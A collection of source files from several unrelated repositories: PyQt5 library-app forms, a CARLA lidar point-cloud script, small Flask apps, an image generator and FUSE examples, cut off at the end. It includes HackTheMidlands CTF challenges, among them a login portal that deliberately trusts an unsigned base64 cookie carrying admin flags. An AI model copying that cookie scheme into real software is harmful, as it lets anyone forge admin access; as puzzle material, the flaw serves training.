self.verticalLayout.setObjectName("verticalLayout")
self.labelEmail = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelEmail.setFont(font)
self.labelEmail.setObjectName("labelEmail")
self.verticalLayout.addWidget(self.labelEmail)
self.lineEditEmail = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEditEmail.setObjectName("lineEditEmail")
self.lineEditEmail.setPlaceholderText('Informe o seu email')
self.verticalLayout.addWidget(self.lineEditEmail)
self.labelUserName = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelUserName.setFont(font)
self.labelUserName.setObjectName("labelUserName")
self.verticalLayout.addWidget(self.labelUserName)
self.lineEditUserName = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEditUserName.setObjectName("lineEditUserName")
self.lineEditUserName.setPlaceholderText('Informe o seu nome de usuário')
self.verticalLayout.addWidget(self.lineEditUserName)
self.labelPassword = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelPassword.setFont(font)
self.labelPassword.setObjectName("labelPassword")
self.verticalLayout.addWidget(self.labelPassword)
self.lineEditPassword = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEditPassword.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEditPassword.setObjectName("lineEditPassword")
self.lineEditPassword.setPlaceholderText('Informe a sua senha')
self.verticalLayout.addWidget(self.lineEditPassword)
self.labelPassword2 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelPassword2.setFont(font)
self.labelPassword2.setObjectName("labelPassword2")
self.verticalLayout.addWidget(self.labelPassword2)
self.lineEditPassword_2 = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEditPassword_2.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEditPassword_2.setObjectName("lineEditPassword_2")
self.lineEditPassword_2.setPlaceholderText('<PASSWORD>ha')
self.verticalLayout.addWidget(self.lineEditPassword_2)
self.labelDateBirth = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelDateBirth.setFont(font)
self.labelDateBirth.setObjectName("labelDateBirth")
self.verticalLayout.addWidget(self.labelDateBirth)
self.dateBirth = QtWidgets.QDateEdit(self.layoutWidget)
self.dateBirth.setObjectName("dateBirth")
self.verticalLayout.addWidget(self.dateBirth)
self.labelGender = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.labelGender.setFont(font)
self.labelGender.setObjectName("labelGender")
self.verticalLayout.addWidget(self.labelGender)
self.selectGender = QtWidgets.QComboBox(self.layoutWidget)
self.selectGender.setObjectName("selectGender")
self.selectGender.addItem('Feminino')
self.selectGender.addItem('Masculino')
self.verticalLayout.addWidget(self.selectGender)
self.buttonSubmit = QtWidgets.QPushButton(Form)
self.buttonSubmit.setGeometry(QtCore.QRect(260, 450, 141, 29))
self.buttonSubmit.setStyleSheet('background-color:#1f4c73')
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.buttonSubmit.setFont(font)
self.buttonSubmit.setObjectName("buttonSubmit")
self.buttonBack = QtWidgets.QPushButton(Form)
self.buttonBack.setGeometry(QtCore.QRect(170, 450, 71, 29))
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.buttonBack.setFont(font)
self.buttonBack.setObjectName("buttonBack")
self.buttonBack.setStyleSheet('background-color:#1f4c73')
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle("Cadastro de Usuário")
self.label.setText(_translate("Form", "TextLabel"))
pixmap = QtGui.QPixmap("icons/iconCadUser.png")
pixmap3 = pixmap.scaled(400, 80, QtCore.Qt.KeepAspectRatio)
self.label.setPixmap(pixmap3)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.labelEmail.setText(_translate("Form", "Email:"))
self.labelUserName.setText(_translate("Form", "Nome de usuário:"))
self.labelPassword.setText(_translate("Form", "Senha:"))
self.labelPassword2.setText(_translate("Form", "Confirme a senha:"))
self.labelDateBirth.setText(_translate("Form", "Data de nascimento:"))
self.labelGender.setText(_translate("Form", "Sexo:"))
self.buttonSubmit.setText(_translate("Form", "Concluir cadastro"))
self.buttonBack.setText(_translate("Form", "Voltar"))
```
#### File: BibWorld/telas/telaEditUser.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMessageBox
import PyrebaseConnector as PC
import sys
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(577, 502)
Form.setFixedSize(577, 502)
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(80, 25, 401, 61))
self.label.setObjectName("label")
self.layoutWidget = QtWidgets.QWidget(Form)
self.layoutWidget.setGeometry(QtCore.QRect(170, 120, 231, 261))
self.layoutWidget.setObjectName("layoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.label_6 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.label_6.setFont(font)
self.label_6.setObjectName("label_6")
self.verticalLayout.addWidget(self.label_6)
self.lineEdit_4 = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEdit_4.setObjectName("lineEdit_4")
self.lineEdit_4.setDisabled(True)
self.verticalLayout.addWidget(self.lineEdit_4)
self.label_7 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.label_7.setFont(font)
self.label_7.setObjectName("label_7")
self.verticalLayout.addWidget(self.label_7)
self.lineEdit_5 = QtWidgets.QLineEdit(self.layoutWidget)
self.lineEdit_5.setObjectName("lineEdit_5")
self.verticalLayout.addWidget(self.lineEdit_5)
self.label_5 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.label_5.setFont(font)
self.label_5.setObjectName("label_5")
self.verticalLayout.addWidget(self.label_5)
self.dateEdit = QtWidgets.QDateEdit(self.layoutWidget)
self.dateEdit.setObjectName("dateEdit")
self.verticalLayout.addWidget(self.dateEdit)
self.label_4 = QtWidgets.QLabel(self.layoutWidget)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.verticalLayout.addWidget(self.label_4)
self.comboBox = QtWidgets.QComboBox(self.layoutWidget)
self.comboBox.setObjectName("comboBox")
self.comboBox.addItem('Feminino')
self.comboBox.addItem('Masculino')
self.verticalLayout.addWidget(self.comboBox)
self.buttonResetPass = QtWidgets.QPushButton(Form)
self.buttonResetPass.setObjectName('buttonResetPass')
self.buttonResetPass.setGeometry(QtCore.QRect(250, 410, 71, 31))
self.buttonResetPass.setStyleSheet('background-color:#1f4c73')
self.buttonResetPass.setFont(font)
self.button_cadastrar = QtWidgets.QPushButton(Form)
self.button_cadastrar.setGeometry(QtCore.QRect(330, 410, 71, 31))
self.button_cadastrar.setStyleSheet('background-color:#1f4c73')
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.button_cadastrar.setFont(font)
self.button_cadastrar.setObjectName("button_cadastrar")
self.button_back = QtWidgets.QPushButton(Form)
self.button_back.setGeometry(QtCore.QRect(170, 410, 71, 31))
self.button_back.setStyleSheet('background-color:#1f4c73')
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.button_back.setFont(font)
self.button_back.setObjectName("button_back")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.label.setText(_translate("Form", "TextLabel"))
pixmap = QtGui.QPixmap("icons/iconEditUser.png")
pixmap3 = pixmap.scaled(400, 80, QtCore.Qt.KeepAspectRatio)
self.label.setPixmap(pixmap3)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label_6.setText(_translate("Form", "Email:"))
self.label_7.setText(_translate("Form", "Nome de usuário:"))
self.label_5.setText(_translate("Form", "Data de nascimento:"))
self.label_4.setText(_translate("Form", "Sexo:"))
self.button_cadastrar.setText(_translate("Form", "Salvar"))
self.button_cadastrar.clicked.connect(self.UpdateUser)
self.buttonResetPass.setText(_translate('Form', 'Mudar\nsenha'))
self.buttonResetPass.clicked.connect(self.changePass)
self.button_back.setText(_translate("Form", "Voltar"))
def changePass(self):
PC.pc.changePassword(PC.pc.auth.current_user['email'])
self.messageBox('Enviamos um email para você com as instruções para cadastrar uma nova senha!', 'Alerta')
def messageBox(self, textMessage, nameWin):
infoBox = QMessageBox()
infoBox.setIcon(QMessageBox.Information)
infoBox.setText(textMessage)
infoBox.setWindowTitle(nameWin)
infoBox.setStandardButtons(QMessageBox.Ok)
infoBox.exec_()
def UpdateUser(self):
erroVazio = 0
if self.lineEdit_5.text() == '':
erroVazio = 1
self.messageBox('Campos obrigatórios!', 'Erro')
if erroVazio == 0:
PC.pc.updateUser(self.lineEdit_5.text(), self.dateEdit.text(), self.comboBox.currentText())
self.messageBox('Dados atualizados!', 'Mensagem')
""" if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
Other = QtWidgets.QMainWindow()
ui = Ui_Form()
ui.setupUi(Other)
Other.show()
sys.exit(app.exec_()) """
```
#### File: BibWorld/telas/telaVerLivro.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
import PyrebaseConnector as PC
import imghdr
import sys
import os
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(577, 502)
MainWindow.setFixedSize(577, 502)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.table = QtWidgets.QTableWidget(MainWindow)
self.table.setGeometry(QtCore.QRect(190, 170, 360, 191))
self.table.setRowCount(5)
self.table.setColumnCount(2)
self.table.setItem(0, 0, QtWidgets.QTableWidgetItem("Título"))
self.table.setItem(1, 0, QtWidgets.QTableWidgetItem("ISBN"))
self.table.setItem(2, 0, QtWidgets.QTableWidgetItem("Autor Principal"))
self.table.setItem(3, 0, QtWidgets.QTableWidgetItem("Data de Publicação"))
self.table.setItem(4, 0, QtWidgets.QTableWidgetItem("Número de Páginas"))
self.table.setColumnWidth(0, 130)
self.table.setColumnWidth(1, 250)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.table.setFont(font)
self.book = {}
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(40, 170, 131, 191))
self.label.setText("")
self.label.setPixmap(QtGui.QPixmap('images/9788544103166.jpg'))
self.label.setScaledContents(True)
self.label.setObjectName("label")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(20, 20, 541, 111))
self.label_13.setText("")
pixmap = QtGui.QPixmap("icons/iconBuscar.png")
pixmap3 = pixmap.scaled(400, 80, QtCore.Qt.KeepAspectRatio)
self.label_13.setPixmap(pixmap3)
self.label_13.setObjectName("label_13")
self.label_13.setAlignment(QtCore.Qt.AlignCenter)
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(200, 400, 87, 29))
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.pushButton.setFont(font)
self.pushButton.setObjectName("pushButton")
self.button_back = QtWidgets.QPushButton(self.centralwidget)
self.button_back.setGeometry(QtCore.QRect(310, 400, 87, 29))
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.button_back.setFont(font)
self.button_back.setObjectName("button_back")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 577, 23))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.button_back.setFont(font)
self.button_back.setStyleSheet('background-color:#1f4c73')
self.pushButton.setFont(font)
self.pushButton.setStyleSheet('background-color:#1f4c73')
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.pushButton.setText(_translate("MainWindow", "Editar livro"))
self.button_back.setText(_translate("MainWindow", "Voltar"))
def UpdateTable(self):
PC.pc.storage.child('images/books/'+str(self.book['ISBN'])).download('images/'+str(self.book['ISBN']))
typeFile = imghdr.what('images/'+str(self.book['ISBN']))
os.rename('images/'+str(self.book['ISBN']), 'images/'+str(self.book['ISBN'])+'.'+typeFile)
fileName = 'images/'+str(self.book['ISBN'])+'.'+typeFile
self.label.setPixmap(QtGui.QPixmap(fileName))
self.table.setItem(0, 1, QtWidgets.QTableWidgetItem(str(self.book['title'])))
self.table.setItem(1, 1, QtWidgets.QTableWidgetItem(str(self.book['ISBN'])))
self.table.setItem(2, 1, QtWidgets.QTableWidgetItem(str(self.book['leadAutor'])))
self.table.setItem(3, 1, QtWidgets.QTableWidgetItem(str(self.book['pubDate'])))
self.table.setItem(4, 1, QtWidgets.QTableWidgetItem(str(self.book['numPages'])))
# if __name__ == '__main__':
# app = QtWidgets.QApplication(sys.argv)
# Other = QtWidgets.QMainWindow()
# ui = Ui_MainWindow()
# ui.setupUi(Other)
# Other.show()
# sys.exit(app.exec_())
```
|
{
"source": "jedeschaud/paris_carla_simulator",
"score": 2
}
|
#### File: jedeschaud/paris_carla_simulator/L3D2_georeferencing.py
```python
import glob
import os
import numpy as np
import sys
import time
from modules import ply
SIZE_POINT_CLOUD = 10000000
DETECT_STOP_VEHICLE = True
STOP_VEHICLE_VELOCITY_NORM = 0.3 #same parameter as in npm_georef for L3D2
ADD_LIDAR_NOISE = False
SIGMA_LIDAR_NOISE = 0.03 #std dev of the Velodyne HDL32E
def main():
for i_map in [0, 1, 2, 3, 4, 5, 6]:
root_dir = "L3D2_Dataset_CARLA_v993f440b/Town0" + str(i_map+1)
folder_input = root_dir+"/generated"
folder_output = root_dir+"/georef"
# Create folders or remove files
os.makedirs(folder_output) if not os.path.exists(folder_output) else [os.remove(f) for f in glob.glob(folder_output+"/*") if os.path.isfile(f)]
file_id_point_cloud = 0
point_cloud = np.empty([SIZE_POINT_CLOUD,8], dtype = np.float32)
point_cloud_index_semantic = np.empty([SIZE_POINT_CLOUD,3], dtype = np.uint32)
index_point_cloud = 0
# Open file and read header
poses_file = open(folder_input+"/full_poses_lidar.txt", 'r')
poses_file.readline()
line_pose = np.array(poses_file.readline().split(), float)
tf = np.vstack((line_pose[:-1].reshape(3,4), [0,0,0,1]))
ts_tf = line_pose[-1]
previous_tf = tf
previous_ts_tf = ts_tf
ply_files = sorted(glob.glob(folder_input+"/frames/frame*.ply"))
start_record = time.time()
max_velocity = 0.
index_ply_file = 0
for f in ply_files:
data = ply.read_ply(f)
nbr_pts = len(data)
i = 0
while (i < nbr_pts):
while (np.abs(data[i]['timestamp']-ts_tf)>1e-4):
line_pose = np.array(poses_file.readline().split(), float)
previous_tf = tf
tf = np.vstack((line_pose[:-1].reshape(3,4), [0,0,0,1]))
previous_ts_tf = ts_tf
ts_tf = line_pose[-1]
if (np.abs(data[i]['timestamp']-ts_tf)>1e-4):
print("Error in timestamp")
sys.exit()
last_point = i
while ((last_point<nbr_pts) and (np.abs(data[last_point]['timestamp']-ts_tf)<=1e-4)):
last_point +=1
current_velocity = 0.4
if (previous_ts_tf !=ts_tf):
current_velocity = np.linalg.norm(tf[:-1,3] - previous_tf[:-1,3])/(ts_tf - previous_ts_tf)
if (current_velocity > max_velocity):
max_velocity = current_velocity
if (not(DETECT_STOP_VEHICLE) or (current_velocity > STOP_VEHICLE_VELOCITY_NORM)):
pts = np.vstack(np.array([data[i:last_point]['x'], data[i:last_point]['y'], data[i:last_point]['z'], np.full(last_point-i, 1)]))
new_pts = tf.dot(pts).T
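                    # pts is a 4xN array in homogeneous coordinates; tf is the
                    # 4x4 lidar pose at this timestamp, so tf.dot(pts).T yields
                    # the Nx4 georeferenced points in the world frame.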
if (ADD_LIDAR_NOISE):
vector_pose_to_new_pts = new_pts[:,:-1] - tf[:-1,3]
new_pts[:,0] = new_pts[:,0] + np.random.randn(last_point-i)*SIGMA_LIDAR_NOISE*vector_pose_to_new_pts[:,0]/np.linalg.norm(vector_pose_to_new_pts, axis=1)
new_pts[:,1] = new_pts[:,1] + np.random.randn(last_point-i)*SIGMA_LIDAR_NOISE*vector_pose_to_new_pts[:,1]/np.linalg.norm(vector_pose_to_new_pts, axis=1)
new_pts[:,2] = new_pts[:,2] + np.random.randn(last_point-i)*SIGMA_LIDAR_NOISE*vector_pose_to_new_pts[:,2]/np.linalg.norm(vector_pose_to_new_pts, axis=1)
if ((index_point_cloud+last_point-i) < SIZE_POINT_CLOUD):
point_cloud[index_point_cloud:index_point_cloud+last_point-i,:] = np.vstack([new_pts[:, 0], new_pts[:, 1], new_pts[:, 2], np.full(last_point-i, tf[0,3]), np.full(last_point-i, tf[1,3]), np.full(last_point-i, tf[2,3]), data[i:last_point]['cos'], data[i:last_point]['timestamp']]).T
point_cloud_index_semantic[index_point_cloud:index_point_cloud+last_point-i,:] = np.vstack([np.full(last_point-i, index_ply_file), data[i:last_point]['index'], data[i:last_point]['semantic']]).T
index_point_cloud += last_point-i
else:
last_temp_point = SIZE_POINT_CLOUD - index_point_cloud + i
point_cloud[index_point_cloud:index_point_cloud+last_temp_point-i,:] = np.vstack([new_pts[0:last_temp_point-i, 0], new_pts[0:last_temp_point-i, 1], new_pts[0:last_temp_point-i, 2], np.full(last_temp_point-i, tf[0,3]), np.full(last_temp_point-i, tf[1,3]), np.full(last_temp_point-i, tf[2,3]), data[i:last_temp_point]['cos'], data[i:last_temp_point]['timestamp']]).T
point_cloud_index_semantic[index_point_cloud:index_point_cloud+last_temp_point-i,:] = np.vstack([np.full(last_temp_point-i, index_ply_file), data[i:last_temp_point]['index'], data[i:last_temp_point]['semantic']]).T
field_names = ['x','y','z','x_sensor_position','y_sensor_position','z_sensor_position','cos','timestamp','index_frame','index','semantic']
ply_file_path = folder_output+"/point_cloud_%02d.ply"%file_id_point_cloud
file_id_point_cloud += 1
if ply.write_ply(ply_file_path, [point_cloud, point_cloud_index_semantic], field_names):
print("Export : "+ply_file_path)
else:
print('ply.write_ply() failed')
index_point_cloud = 0
point_cloud[index_point_cloud:index_point_cloud+last_point-last_temp_point,:] = np.vstack([new_pts[last_temp_point-i:last_point-i, 0], new_pts[last_temp_point-i:last_point-i, 1], new_pts[last_temp_point-i:last_point-i, 2], np.full(last_point-last_temp_point, tf[0,3]), np.full(last_point-last_temp_point, tf[1,3]), np.full(last_point-last_temp_point, tf[2,3]), data[last_temp_point:last_point]['cos'], data[last_temp_point:last_point]['timestamp']]).T
point_cloud_index_semantic[index_point_cloud:index_point_cloud+last_point-last_temp_point,:] = np.vstack([np.full(last_point-last_temp_point, index_ply_file), data[last_temp_point:last_point]['index'], data[last_temp_point:last_point]['semantic']]).T
index_point_cloud = last_point-last_temp_point
i = last_point
index_ply_file +=1
print("time.time()-start_record : ", time.time()-start_record)
print("Max velocity : ", max_velocity, " m/s")
poses_file.close()
if __name__ == '__main__':
main()
```
|
{
"source": "jedevc/docker-dino-demo",
"score": 2
}
|
#### File: docker-dino-demo/dino/dino.py
```python
import os
from flask import Flask, request, redirect, send_from_directory
from werkzeug.utils import secure_filename
app = Flask(__name__)
BASE = os.getcwd()
UPLOADS = os.path.join(BASE, os.environ["UPLOADS_DIR"])
@app.route("/")
def index():
return "Hello World (and dinosuars)!"
@app.route("/upload", methods=["POST"])
def upload():
if "file" not in request.files:
return "No file provided", 400
file = request.files["file"]
if file.filename == "":
return "No selected file", 400
out_filename = secure_filename(file.filename)
file.save(os.path.join(UPLOADS, out_filename))
return redirect("/dinos/" + out_filename)
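# Upload sketch (assuming the default Flask dev server on port 5000):
#   curl -F "file=@photo.png" http://localhost:5000/upload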
@app.route("/dinos/<path:filename>")
def dinos(filename):
return send_from_directory(UPLOADS, filename)
```
|
{
"source": "jedevc/geometric-background",
"score": 3
}
|
#### File: geometric-background/rngback/generator.py
```python
from PIL import Image, ImageDraw, ImageColor
import random
import colorsys
from . import color
class Generator:
'''
Generator for a random background image.
Args:
width: The image width.
height: The image height.
columns: The number of shapes to fit along the x-axis.
rows: The number of shapes to fit along the y-axis.
offset: The internal offset of each shape.
background: The color of the image background.
foreground: The colors of the shapes in the image.
        blanks: Whether some grid cells may be left empty.
        variation: The amount to vary the color of the shapes, either a single
            value or an (h, s, l) tuple.
'''
def __init__(self, width, height, columns, rows,
offset=0, background='white', foreground='black',
blanks=True, variation=0):
self.width = width
self.height = height
self.columns = columns
self.rows = rows
self.cwidth = width / columns
self.rheight = height / rows
self.offset = offset
self.background = color.parse_color(background)
self.foreground = color.parse_colors(foreground)
self.blanks = blanks
try:
self.hvariation, self.svariation, self.lvariation = variation
except TypeError:
self.hvariation = self.svariation = self.lvariation = variation
def generate(self, seed=None):
'''
Generate an image.
Args:
seed: The initial internal state of the random generator.
Returns:
The image.
'''
if seed:
random.seed(seed)
else:
random.seed()
img = Image.new('RGB', (self.width, self.height), self.background)
drw = ImageDraw.Draw(img, 'RGBA')
for i in range(self.columns):
for j in range(self.rows):
poly = self.make_shape(i, j)
if poly:
color = self.make_color()
drw.polygon(poly, fill=color)
return img
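    # Usage sketch (assuming color.parse_colors accepts a list of CSS color
    # strings; the values here are illustrative):
    #   gen = Generator(800, 600, 16, 12, offset=4,
    #                   foreground=['#1f4c73', '#aa3939'],
    #                   variation=(20, 10, 10))
    #   gen.generate(seed=42).save('background.png')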
def make_shape(self, *args):
'''
Generate the vertices of a randomly chosen shape (rectangle or
triangle).
Args: (see make_square)
Returns:
A list of the vertices of the shape or None for no shape.
'''
if self.blanks:
choice = random.randint(0, 6)
else:
choice = random.randint(1, 6)
if choice == 0:
return None
elif choice in [1, 2]:
return self.make_square(*args)
else:
return self.make_triangle(*args)
def make_square(self, x, y):
'''
Generate the vertices of a square.
Args:
x: The localized x-coordinate of the square to generate.
y: The localized y-coordinate of the square to generate.
Returns:
A list of the vertices of the square.
'''
x1 = x * self.cwidth + self.offset
y1 = y * self.rheight + self.offset
x2 = (x + 1) * self.cwidth - self.offset
y2 = (y + 1) * self.rheight - self.offset
return [(x1, y1),
(x2, y1),
(x2, y2),
(x1, y2)]
def make_triangle(self, *args):
'''
        Generate the vertices of a randomly-oriented triangle.
Args: (see make_square)
Returns:
A list of the vertices of the triangle.
'''
points = self.make_square(*args)
points.remove(random.choice(points))
return points
def make_color(self):
'''
Generate a random foreground color using the provided foreground colors
and variation amounts.
Returns:
The altered color as an RGB tuple.
'''
red, green, blue = random.choice(self.foreground)
hue, lit, sat = colorsys.rgb_to_hls(red / 255, green / 255, blue / 255)
hue = int(hue * 360)
        hue += random.randint(-(self.hvariation // 2), self.hvariation // 2)
hue = max(0, min(hue, 360))
sat = int(sat * 100)
        sat += random.randint(-(self.svariation // 2), self.svariation // 2)
sat = max(0, min(sat, 100))
lit = int(lit * 100)
        lit += random.randint(-(self.lvariation // 2), self.lvariation // 2)
lit = max(0, min(lit, 100))
return ImageColor.getrgb(f'hsl({hue}, {sat}%, {lit}%)')
```
|
{
"source": "jedevc/HackTheMidlandsCTF19",
"score": 3
}
|
#### File: 1-login-portal/app/app.py
```python
import flask
from flask import Flask
from flask import request
import codecs
import base64
from .caller import caller, number
app = Flask("login")
app.register_blueprint(caller)
@app.route("/", methods=['GET', 'POST'])
def root():
if check_data(request.cookies.get('data'), 'issignedin'):
return flask.redirect('/verification')
resp = flask.make_response(flask.render_template('login.html'))
if 'data' not in request.cookies:
resp.set_cookie('data', create_cookie({'issignedin': 'no', 'isadmin': 'no'}))
return resp
@app.route("/login", methods=['GET', 'POST'])
def login():
params = {
'title': 'Login'
}
if check_data(request.cookies.get('data'), 'issignedin'):
return flask.redirect('/verification')
if request.method == 'GET':
args = request.args
if request.method == 'POST':
args = request.form
if 'username' in args and len(args['username']) == 0:
return flask.render_template('login.html', **params, error='invalid username')
elif 'password' in args and len(args['password']) == 0:
return flask.render_template('login.html', **params, error='invalid password')
elif 'username' in args and 'password' in args:
return flask.render_template('login.html', **params, error='incorrect login credentials')
resp = flask.make_response(flask.render_template('login.html', **params))
if 'data' not in request.cookies:
resp.set_cookie('data', create_cookie({'issignedin': 'no', 'isadmin': 'no'}))
return resp
@app.route("/logout", methods=['GET', 'POST'])
def logout():
resp = flask.make_response(flask.redirect('/'))
resp.set_cookie('data', create_cookie({'issignedin': 'no', 'isadmin': 'no'}))
return resp
@app.route("/verification", methods=['GET', 'POST'])
def verification():
if check_data(request.cookies.get('data'), 'issignedin'):
if check_data(request.cookies.get('data'), 'isadmin'):
return flask.render_template(
'secret.html',
                title='identity verifier',
message='please call ' + number + ' to verify your identity'
)
else:
title = 'unauthorized access'
msg = "you're logged in, but not as the admin..."
return flask.render_template('secret.html', title=title, message=msg)
else:
return flask.render_template('base.html', error='you can\'t do that')
def check_data(d, *keys, value='yes'):
if not d:
return False
data = parse_cookie(d)
for key in keys:
if data.get(key) != value:
return False
return True
def create_cookie(cookie):
parts = []
for (key, value) in cookie.items():
parts.append(f'{key}={value}')
data = ';'.join(parts)
# data = codecs.decode(data, 'rot13')
data = base64.b64encode(data.encode('utf8'))
return data
def parse_cookie(data):
cookie = {}
data = base64.b64decode(data).decode('utf8')
# data = codecs.encode(data, 'rot13')
parts = data.split(';')
for part in parts:
        key, value = part.split('=', 1)
cookie[key] = value
return cookie
```
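The portal never signs the `data` cookie, so `check_data` trusts whatever base64 blob the client sends. A minimal sketch of the resulting forgery (the `forge_admin_cookie` name is illustrative, not part of the challenge source):

```python
import base64

def forge_admin_cookie():
    # Mirror create_cookie() above, but with both flags set to 'yes'.
    data = ';'.join(f'{key}={value}' for key, value in
                    {'issignedin': 'yes', 'isadmin': 'yes'}.items())
    return base64.b64encode(data.encode('utf8'))

print(forge_admin_cookie())  # paste this value into the 'data' cookie
```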
#### File: challenges/4-pickled-snakes/code.py
```python
import pickle
def main():
with open('flag.txt') as f:
flag = f.readline().strip()
result = [
"this file is fully encrypted using the pickled snakes method we talked about!!!",
list(enumerate(flag))
]
with open('flag.unknown', 'wb') as f:
pickle.dump(result, f)
if __name__ == "__main__":
main()
```
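Because `enumerate` keeps the characters in order, the "encryption" is trivially reversible. A sketch of the assumed decoder (not part of the challenge source):

```python
import pickle

def main():
    with open('flag.unknown', 'rb') as f:
        message, pairs = pickle.load(f)  # [banner string, [(index, char), ...]]
    print(''.join(char for _, char in pairs))

if __name__ == "__main__":
    main()
```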
|
{
"source": "jedevc/hack-the-midlands",
"score": 2
}
|
#### File: hack-the-midlands/kittenkollector/views.py
```python
from . import app, get_db
import flask
@app.route('/')
def root():
return flask.render_template('index.html')
@app.route('/create')
def create_kitten():
return flask.render_template('create.html')
@app.route('/kitten')
def view_kitten():
kode = flask.request.args.get('kode')
db = get_db()
result = db.get(kode)
if result:
name, location = result
image = '/api/images/' + kode
return flask.render_template('kitten.html', kode=kode, name=name,
location=location, image=image)
else:
return '', 404
@app.route('/favicon.ico')
def favicon():
return flask.send_file('favicon.ico')
```
|
{
"source": "jedevc/qufs",
"score": 3
}
|
#### File: qufs/examples/dict.py
```python
import mafs
import json
fs = mafs.MagicFS()
fs.add_argument('file', help='json file to read from')
# read json file
with open(fs.args.file) as f:
items = json.load(f)
def dig(d, parts):
    if parts:
        try:
            res = d.get(parts[0])
            if res is not None:
                return dig(res, parts[1:])
        except (KeyError, AttributeError):
            return None
    else:
        return d
@fs.read('/*item')
def read_item(path, ps):
return str(dig(items, ps.item)) + '\n'
@fs.list('/')
def list_root(path, ps):
return items.keys()
@fs.list('/*item')
def list_item(path, ps):
return dig(items, ps.item).keys()
@fs.stat('/*item')
def stat_item(path, ps):
item = dig(items, ps.item)
if item:
if hasattr(item, 'get'):
return {'st_mode': 0o755 | mafs.FileType.DIRECTORY}
else:
return {}
raise FileNotFoundError()
fs.run()
```
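A quick standalone check of `dig`, independent of the FUSE machinery (the sample dictionary is made up):

```python
items = {'a': {'b': {'c': 1}}}

assert dig(items, []) == items              # empty path returns the root
assert dig(items, ['a', 'b']) == {'c': 1}   # walks one level per part
assert dig(items, ['a', 'b', 'c']) == 1     # descends to a leaf
assert dig(items, ['a', 'x', 'c']) is None  # missing keys yield None
```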
#### File: qufs/examples/places.py
```python
from mafs import MagicFS
fs = MagicFS()
@fs.read('/place/here')
def place_here(path, ps):
return 'this is here\n'
@fs.read('/place/there')
def place_there(path, ps):
return 'this is there\n'
@fs.read('/place/:any')
def place_any(path, ps):
return 'this is ' + ps.any + '!\n'
@fs.readlink('/shortcut')
def shortcut(path, ps):
return './place/a quicker way'
fs.run()
```
#### File: qufs/mafs/router.py
```python
import os
from collections import namedtuple
class Router:
def __init__(self):
self.root = Node()
def add(self, route, data):
